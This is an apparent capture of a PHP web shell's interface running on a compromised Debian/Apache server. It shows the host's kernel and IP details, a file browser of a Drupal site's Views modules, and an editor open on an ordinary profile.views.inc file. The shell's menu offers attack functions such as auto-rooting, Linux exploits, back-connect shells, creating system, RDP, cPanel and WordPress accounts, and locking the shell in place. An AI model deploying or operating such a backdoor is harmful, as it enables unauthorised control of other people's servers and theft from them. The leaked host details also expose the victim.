Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.12.34.96
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
modules /
[ HOME SHELL ]
Name
Size
Permission
Action
aggregator
[ DIR ]
drwxr-xr-x
book
[ DIR ]
drwxr-xr-x
comment
[ DIR ]
drwxr-xr-x
contact
[ DIR ]
drwxr-xr-x
field
[ DIR ]
drwxr-xr-x
filter
[ DIR ]
drwxr-xr-x
locale
[ DIR ]
drwxr-xr-x
node
[ DIR ]
drwxr-xr-x
profile
[ DIR ]
drwxr-xr-x
search
[ DIR ]
drwxr-xr-x
statistics
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
taxonomy
[ DIR ]
drwxr-xr-x
tracker
[ DIR ]
drwxr-xr-x
translation
[ DIR ]
drwxr-xr-x
user
[ DIR ]
drwxr-xr-x
aggregator.views.inc
12.06
KB
-rw-r--r--
book.views.inc
3.37
KB
-rw-r--r--
comment.views.inc
19.74
KB
-rw-r--r--
comment.views_default.inc
14.23
KB
-rw-r--r--
contact.views.inc
450
B
-rw-r--r--
field.views.inc
18.61
KB
-rw-r--r--
file.views.inc
2.33
KB
-rw-r--r--
filter.views.inc
744
B
-rw-r--r--
image.views.inc
2.31
KB
-rw-r--r--
locale.views.inc
5.77
KB
-rw-r--r--
node.views.inc
24.63
KB
-rw-r--r--
node.views_default.inc
16.01
KB
-rw-r--r--
node.views_template.inc
7.79
KB
-rw-r--r--
poll.views.inc
1006
B
-rw-r--r--
profile.views.inc
5.63
KB
-rw-r--r--
search.views.inc
5.74
KB
-rw-r--r--
search.views_default.inc
5.99
KB
-rw-r--r--
statistics.views.inc
6.35
KB
-rw-r--r--
statistics.views_default.inc
12.89
KB
-rw-r--r--
system.views.inc
19.52
KB
-rw-r--r--
taxonomy.views.inc
17.28
KB
-rw-r--r--
taxonomy.views_default.inc
5.63
KB
-rw-r--r--
tracker.views.inc
5.21
KB
-rw-r--r--
translation.views.inc
3.48
KB
-rw-r--r--
user.views.inc
16.23
KB
-rw-r--r--
views.views.inc
3.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : profile.views.inc
<?php /** * @file * Provide views data and handlers for user.module. * * @ingroup views_module_handlers */ /** * Implements hook_views_data(). */ function profile_views_data() { $data['profile_values']['moved to'] = 'profile_value'; // Define the base group of this table. Fields that don't // have a group defined will go into this field by default. $data['profile_value']['table']['group'] = t('Profile'); $data['profile_value']['table']['join'] = array( 'node' => array( 'left_table' => 'profile_value', 'left_field' => 'uid', 'field' => 'uid', ), 'users' => array( 'left_table' => 'profile_value', 'left_field' => 'uid', 'field' => 'uid', ), ); $fields = profile_views_get_fields(); foreach ($fields as $field) { $table_name = 'profile_value_' . str_replace('-', '_', $field->name); $data[$table_name] = array( 'table' => array( 'group' => t('Profile'), 'join' => array( 'node' => array( 'table' => 'profile_value', 'left_table' => 'users', 'left_field' => 'uid', 'field' => 'uid', 'extra' => array(array('field' => 'fid', 'value' => $field->fid)), ), 'users' => array( 'table' => 'profile_value', 'left_field' => 'uid', 'field' => 'uid', 'extra' => array(array('field' => 'fid', 'value' => $field->fid)), ), ), ), ); // All fields in the table are named 'value'. $data[$table_name]['value'] = profile_views_fetch_field($field); } return $data; } /** * Get all profile fields */ function profile_views_get_fields() { static $fields = NULL; if (!isset($fields)) { $fields = array(); $results = db_query("SELECT * FROM {profile_field} ORDER BY category, weight"); foreach ($results as $row) { if (!empty($row->options)) { if (!in_array(substr($row->options, 0, 2), array('a:', 'b:', 'i:', 'f:', 'o:', 's:', ))) { // unserialized fields default version $options = $row->options; unset($row->options); $row->options = $options; } else { // serialized fields or modified version $row->options = unserialize($row->options); } } $fields[$row->fid] = $row; } } return $fields; } /** * Add profile fields to view table */ function profile_views_fetch_field($field) { $data = array( 'title' => t('@category: @field-name', array('@category' => $field->category, '@field-name' => $field->title)), ); // Add fields specific to the profile type. switch ($field->type) { case 'textfield': $data += array( 'help' => t('Profile textfield'), 'field' => array( 'handler' => 'views_handler_field_user', 'click sortable' => TRUE, ), 'sort' => array( 'handler' => 'views_handler_sort', ), 'filter' => array( 'handler' => 'views_handler_filter_string', ), 'argument' => array( 'handler' => 'views_handler_argument_string', ), ); break; case 'textarea': $data += array( 'help' => t('Profile textarea'), 'field' => array( 'handler' => 'views_handler_field_markup', 'format' => filter_default_format(), ), 'sort' => array( 'handler' => 'views_handler_sort', ), 'filter' => array( 'handler' => 'views_handler_filter_string', ), ); break; case 'checkbox': $data += array( 'help' => t('Profile checkbox'), 'field' => array( 'handler' => 'views_handler_field_boolean', 'click sortable' => TRUE, ), 'sort' => array( 'handler' => 'views_handler_sort', ), 'filter' => array( 'handler' => 'views_handler_filter_boolean_operator', 'accept null' => TRUE, ), // @todo there ought to be a boolean argument handler ); break; case 'url': $data += array( 'help' => t('Profile URL'), 'field' => array( 'handler' => 'views_handler_field_url', 'click sortable' => TRUE, ), 'sort' => array( 'handler' => 'views_handler_sort', ), 'filter' => array( 'handler' => 'views_handler_filter_string', ), ); break; case 'selection': $data += array( 'help' => t('Profile selection'), 'field' => array( 'handler' => 'views_handler_field', 'click sortable' => TRUE, ), 'sort' => array( 'handler' => 'views_handler_sort', ), 'filter' => array( 'handler' => 'views_handler_filter_profile_selection', 'fid' => $field->fid, ), 'argument' => array( 'handler' => 'views_handler_argument_string', ), ); break; case 'list': $data += array( 'help' => t('Profile freeform list %field-name.', array('%field-name' => $field->title)), 'field' => array( 'handler' => 'views_handler_field_profile_list', 'no group by' => TRUE, ), 'filter' => array( 'handler' => 'views_handler_filter_string', ), ); break; case 'date': $data += array( 'help' => t('Profile date %field-name.', array('%field-name' => $field->title)), 'field' => array( 'handler' => 'views_handler_field_profile_date', ), ); break; } // @todo: add access control to hidden fields. return $data; }
Close